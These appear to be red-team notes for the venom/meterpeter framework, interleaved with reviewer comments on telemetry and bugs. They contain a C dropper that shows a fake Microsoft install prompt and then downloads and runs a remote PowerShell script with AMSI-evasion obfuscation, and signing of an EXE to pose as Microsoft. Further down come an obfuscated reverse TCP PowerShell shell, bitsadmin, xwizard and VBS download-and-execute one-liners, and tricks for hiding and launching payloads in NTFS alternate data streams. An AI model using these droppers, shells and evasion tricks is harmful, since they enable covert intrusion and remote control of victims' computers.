meterpeter new updates |
Dropper.c
- Compile this template to EXE (mingw32)
- LolBin:
new-object -com WinHttp.WinHttpRequest.5.1
- LolBin:
/*
Author: r00t-3xp10it (SSA RedTeam @2020)
Framework: Venom v1.0.17 - Amsi Evasion - Agent nº 7
Function: This template is used to download Client.ps1 from the attacker machine (LAN) and execute it in the
target's RAM. Only the .ps1 stage is fileless (it is never written to disk); the compiled dropper itself is an on-disk EXE.
*/
#include<stdio.h>
#include<stdlib.h>
#include<winsock2.h>
#include<windows.h>
int main()
{
/* PS MsgBox for target user reading (Social Engineering). $Drop reads as a framework placeholder that is
   presumably substituted before compiling - TODO confirm. The tripled quotes look like cmd->powershell
   argument escaping. */
/* NOTE(review): the statement below has no terminating ';' - as written this file does not compile. */
system("powershell (New-Object -ComObject Wscript.Shell).Popup(\"\"\"Install Microsoft Application ?\"\"\",4,\"\"\"$Drop - 3.10.5-dev Windows Installer\"\"\",1+64)")
/* Remotely download Client.ps1 and execute it in the target's RAM (only the .ps1 is fileless; this
   dropper itself is an on-disk EXE). */
/* NOTE(review): the quotes around {2}{0}{1} and {1}{0}{2} are unescaped inside a C string literal, so the
   literal ends at the first of them and this line does not compile either. Even once escaped, the ';'
   after $MyCat=New-Object... is also a statement separator for the OUTER powershell instance, so verify
   the command line that actually reaches the inner one. */
/* Defender notes: each system() call spawns cmd.exe -> powershell.exe as children of this binary
   (process-tree telemetry). The inner shell runs with -exec bypass -w 1 (hidden window), instantiates
   the WinHttp.WinHttpRequest.5.1 COM object, GETs http://$lhost/$Drop.ps1 over plain HTTP and passes the
   response text to ('i'+'ex'), i.e. Invoke-Expression. Script Block Logging, where enabled, is expected
   to record the executed text regardless of the string splitting - confirm in your environment. */
system("powershell $MyCat=("{2}{0}{1}" -f'o','xy','$pr');$Token=("{1}{0}{2}" -f'pa','by','ss');powershell -exec $Token -w 1 -C $MyCat=New-Object -Com WinHttp.WinHttpRequest.5.1;$MyCat.open('GET','http://$lhost/$Drop.ps1',`$false);$MyCat.send();& ('i'+'ex') $MyCat.responseText;");
return 0;
}
Sign the standalone executable (Authenticode, using a self-signed X.509 certificate)
- openssl prompts interactively for the private-key passphrase; it must match the -pass value given to osslsigncode below
# Self-signed RSA-4096 certificate + private key, valid for 365 days. openssl prompts interactively for the
# key passphrase and for the subject fields (there is no -subj or -nodes here).
openssl req -x509 -newkey rsa:4096 -keyout output/key.pem -out output/cert.pem -days 365
# Authenticode-signs output/evil_x86.exe with that key. NOTE(review): -pass "toor" is hardcoded and must
# match the passphrase typed above or signing fails; it is also exposed in shell history and ps output.
# The certificate is self-signed and not chained to any trusted root, so chain validation (signtool verify,
# SmartScreen) is expected to still report an unknown publisher - "Microsoft" in -n/-i only changes the
# displayed description and URL. The timestamp server (-t) is contacted over plain http.
osslsigncode sign -certs "output/cert.pem" -pass "toor" -key "output/key.pem" -n "Microsoft" -i "https://www.Microsoft.com" -t "http://timestamp.comodoca.com/authenticode" -in "output/evil_x86.exe" -out "output/signed_x86.exe"
OR:
- Alternatively, the reverse technique can be used to deliver the URL instead of a dropper.
Reverse tcp ps shell
- With the listener (LHOST) IP address obfuscated as hex-encoded octets
## Build Reverse TCP Powershell Shell (hex obfuscated).
# Operator-side status banner followed by a 2s pause. BlueF/white are presumably colour-escape variables
# defined earlier in the framework (not visible in this excerpt). The misspelling is inside the echoed
# string and is left as-is here.
echo "${BlueF}[☠]${white} Writting Reverse Powershell Shell to output ..";sleep 2
<#
Obfuscated (hex) Reverse Powershell Shell
Framework: venom v1.0.17 (amsi evasion)

Reviewer notes (defensive reading of this listing):
- The outer loop reconnects forever, sleeping 3s between attempts (Start-Sleep at the bottom).
- The C2 address is rebuilt at runtime from a list of hex octets in the variable hexed, and the port comes
  from lport; neither is defined in this excerpt (presumably injected by the framework) - TODO confirm.
- The first bytes on the wire are a fake HTTP GET header so the connection resembles a web request. The
  header is malformed: the Mozilla/5.0 line carries no 'User-Agent:' field name, which is a network fingerprint.
- The TcpClient type name and the command-execution alias are assembled from fragments and character
  indexing so neither 'System.Net.Sockets.TCPClient' nor 'iex' appears literally. Where Script Block
  Logging is enabled it is expected to record the script text at execution time regardless of this
  string splitting - confirm in your environment.
- The backslash-escaped backticks and backslash-dollar on some lines show this listing is emitted from a
  bash double-quoted context; bash strips those escapes before PowerShell sees the text.
#>
while ($true) {
# Fragments of 'System.Net.Sockets.TCPClient', concatenated in the New-Object call below.
$gui = "PCli";
$func = "ent";
$bin = "ets.TC";
$auto = ".Net.Sock";
$Cache = "System";
# Hex octets -> dotted-decimal C2 address.
$px = $hexed;
$p = ($px | ForEach { [convert]::ToInt32($_,16) }) -join '.';
# Decoy request header sent right after connecting (see the malformed User-Agent note above).
$w = "GET /index.html HTTP/1.1\`r\`nHost: $p\`r\`nMozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0\`r\`nAccept: text/html\`r\`n\`r\`n\";
# ASCIIEncoding type (used for decoding below), a 64 KiB receive buffer, and the 12-char alphabet for the alias.
$s = [System.Text.ASCIIEncoding];[byte[]]\$b = 0..65535|%{0};$x = "n-eiorvsxpk5";
# Defines an alias named after the alphabet string whose target is three indexed characters:
# index -9 -> 'i', index -10 -> 'e', index -4 -> 'x', i.e. the alias resolves to iex (Invoke-Expression).
Set-alias $x ($x[$true-10] + ($x[[byte]("0x" + "FF") - 265]) + $x[[byte]("0x" + "9a") - 158]);
# Connect to the C2 (TcpClient constructor: host, port).
$y = New-Object $Cache$auto$bin$gui$func($p,$lport);
$z = $y.GetStream();
# Send the decoy header as UTF-8 (UTF8 presumably resolves to the static Encoding property inherited by ASCIIEncoding).
$d = $s::UTF8.GetBytes($w);
$z.Write($d, 0, $d.Length);
# Prompt string: output of whoami (run through the alias) followed by '> '.
$t = (n-eiorvsxpk5 whoami) + "> ";
# Command loop: each received chunk is decoded as ASCII, executed via the alias with stderr merged into
# stdout, and the result plus the prompt is written back on the same socket.
while(($l = $z.Read($b, 0, $b.Length)) -ne 0) {
$v = (New-Object -TypeName $s).GetString($b,0, $l);
$d = $s::UTF8.GetBytes((n-eiorvsxpk5 $v 2>&1 | Out-String )) + $s::UTF8.GetBytes($t);
$z.Write($d, 0, $d.Length);
}
# Read returned 0 (peer closed): close the client and retry after 3s.
$y.Close();
Start-Sleep -Seconds 3
}
For example, it will take a string like ... New-Object System.Net.Sockets.TCPClient ... and convert it to:
$a = "Syste"
$b = "m.Net.Soc"
$c = "kets.TCP"
$d = "Client"
... New-Object $a$b$c$d ...
Another example
$zvlOGdEJVsPNBDwfKFWpvFYvlgJXDvIUgTnQ = "b`y"
$kjEbjGhcfGYxfdIOzgvYTE.kjGTFhAfdUsjxIPbk = "pa`s`s"
amsi script.block signatures: https://github.com/PowerShell/PowerShell/blob/v6.0.0-alpha.18/src/System.Management.Automation/engine/runtime/CompiledScriptBlock.cs#L1612-L1660
Not detected by Windows Defender at the time of writing (2020). This is a point-in-time result: AV and AMSI verdicts change with signature updates and should be re-tested before relying on it.
server: https://raw.githubusercontent.com/federicochieregato/DarkFox/master/server.py
Client: https://github.com/federicochieregato/DarkFox/blob/master/client.py
darkarmor: https://blog.dylan.codes/bypassing-av-via/
use winHTTPRequest with this ? => https://github.com/r00t-3xp10it/venom/tree/master/templates/hta_attack
One-liner download
REM Creates a BITS download job named 'hackingarticles' (bitsadmin /transfer <jobname> <url> <dest>). BITS jobs
REM are enumerable with bitsadmin /list /allusers and are logged by the BITS-Client event channel; the URL and
REM destination path are visible on the bitsadmin command line.
bitsadmin /transfer hackingarticles http://192.168.1.13/ignite.png C:\Users\pedro\Desktop\ignite.png
REM Launches xwizard.exe RunWizard with a CLSID and a /z argument carrying a pastebin URL, waits 6 seconds,
REM then force-kills xwizard.exe. What xwizard does with that CLSID/URL is not shown here - verify against the
REM LOLBAS entry for xwizard before relying on it. Telemetry: xwizard.exe started with a URL on its command
REM line, followed shortly by taskkill.
start xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/2305mJkp && timeout 6 && taskkill /F /IM xwizard.exe >NUL
Download with VBS api
- dropper.vbs (replace Objshell.Run API flagged by AV)
' The ProgID is split into fragments so the literal 'WScript.Shell' does not appear in the script, and Exec is
' used in place of the Run method the note above says is flagged.
' NOTE(review): VBScript strings have no backslash escapes, so '\\' reaches PowerShell as two backslashes, and
' '%tmp%' is not expanded inside a PowerShell single-quoted string; WshShell.Run documents environment-variable
' expansion but I am not certain Exec does - verify the path Client.exe actually lands at. Also, this is the
' github.com /blob/ page URL, which serves HTML rather than the raw binary - confirm the intended URL.
CreateObject("WS"+"cri"+"pt.Sh"+"ell").Exec "powershell -exec bypass -w 1 -C (NeW-Object Net.WebClient).DownloadFile('https://github.com/r00t-3xp10it/venom/blob/master/bin/Client.exe', '%tmp%\\Client.exe')"
' Second launch: hidden-window Start-Process of the downloaded binary with ip/port arguments (same path caveat).
' Telemetry: the script host (wscript.exe/cscript.exe) spawning powershell.exe twice with -w 1 / -windowstyle hidden.
CreateObject("WS"+"cri"+"pt.Sh"+"ell").Exec "powershell Start-Process -windowstyle hidden -FilePath '%tmp%\\Client.exe' -ArgumentList 'ip=192.168.1.73','port=666'"
Alternate data streams (ADS)
What are Alternate Data Streams?
Alternate Data Streams (ADS) have existed since the introduction of NTFS on Windows. They were designed to provide
compatibility with the older Macintosh Hierarchical File System (HFS), which stores file metadata in so-called resource forks.
In practice, ADS can be used to hide a secret or malicious file inside the file record of an innocent-looking file: when
Windows shows you a file, say "readme.txt", the metadata that tells the system where "readme.txt" lives may also
reference "EvilSpyware.exe". Such files can therefore be present on the system without being visible in Explorer or a plain
`dir` listing, which only show the main stream's name and size.
How to list Alternate Data Streams from the command line? (`dir /R` in cmd; in PowerShell, `Get-Item -Path <file> -Stream *`.)
dir /r
Proof-Of-Concept
- Create a text file into which the JPG image will be embedded (as an alternate stream)
REM Create the carrier text file; its visible content and size remain those of the main stream.
echo test if it works > SSAredTeam.txt
REM Write the image bytes into an alternate stream named kali-linux.jpg of the same file. Alternate streams
REM are an NTFS feature and are typically dropped when the file is copied to non-NTFS media or archived
REM (confirm for your transport); they are enumerable with dir /R or PowerShell Get-Item -Stream *.
type kali-linux.jpg > SSAredTeam.txt:kali-linux.jpg
- Delete the original kali-linux.jpg; only the copy inside the alternate stream remains
del kali-linux.jpg
- see ads
dir /r
- Open the image directly from the alternate stream with mspaint
mspaint.exe C:\Users\pedro\Desktop\SSAredTeam.txt:kali-linux.jpg
Hide an MP3 in a text file
- Create a text file into which the MP3 file will be embedded (as an alternate stream)
echo test if it works > SSAredTeam.txt
- Append the MP3 file to the text file as an alternate stream
type mysong.mp3 > SSAredTeam.txt:mysong.mp3
- Delete mysong mp3
del mysong.mp3
- see ads
dir /r
- Execute mysong.mp3 (ads)
wmplayer.exe C:\Users\pedro\Desktop\SSAredTeam.txt:mysong.mp3
Hide an EXE in a text file
- Create a text file into which the EXE file will be embedded (as an alternate stream)
echo test if it works > SSAredTeam.txt
- Append the EXE file to the text file as an alternate stream
type payload.exe > SSAredTeam.txt:payload.exe
- Delete payload exe
del payload.exe
- see ads
dir /r
- Execute payload.exe (ads)
wmic.exe process call create "C:\Users\pedro\Desktop\SSAredTeam.txt:payload.exe"
- Execute payload.bat stored in an Alternate Data Stream (ADS).
cmd.exe - < SSAredTeam.txt:payload.bat
- Execute payload.ps1 stored in an Alternate Data Stream (ADS).
powershell .\SSAredTeam.txt:payload.ps1
Download files using VBS
' Set your url settings and the saving options
' NOTE(review): this is the github.com /blob/ page URL, which serves an HTML page rather than the raw
' binary, so the file written below would not be the executable - confirm the intended URL.
strFileURL = "https://github.com/r00t-3xp10it/venom/blob/master/bin/Client.exe"
' Hardcoded per-user destination (user 'pedro'); fails for any other account.
strHDLocation = "C:\Users\pedro\Desktop\Client.exe"
' Synchronous GET via MSXML2.XMLHTTP (the third argument, false, makes the call blocking).
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
' Only on HTTP 200 is the body written to disk; any other status skips the block silently.
If objXMLHTTP.Status = 200 Then
' ADODB.Stream in binary mode (Type 1) persists the response body.
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0 'Set the stream position to the start
' Removes any previous copy first - presumably because SaveToFile's default mode fails on an existing file.
Set objFSO = Createobject("Scripting.FileSystemObject")
if objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
' NOTE(review): shown unconditionally - it reports success even when Status was not 200 and nothing was saved.
x=MsgBox("File Successfully Downloaded" & vbCrLf & "Storage: C:\Users\pedro\Desktop\Client.exe",64,"VBS Downloader")
' NOTE(review): 'start /min Client.exe' resolves relative to the current working directory, not to
' strHDLocation (Desktop); the two only agree when the script is run from the Desktop. Telemetry: the
' script host (wscript.exe/cscript.exe) -> cmd.exe -> Client.exe with ip=/port= on the command line.
CreateObject("WScript.Shell").Exec "cmd /R start /min Client.exe ip=192.168.1.73 port=666"
venom v1.0.17 - shinigami
Dropper.c
file before being compiled into a Linux standalone executable (note: the Dropper.c shown earlier includes winsock2.h/windows.h and targets Windows; this presumably refers to a separate Linux template)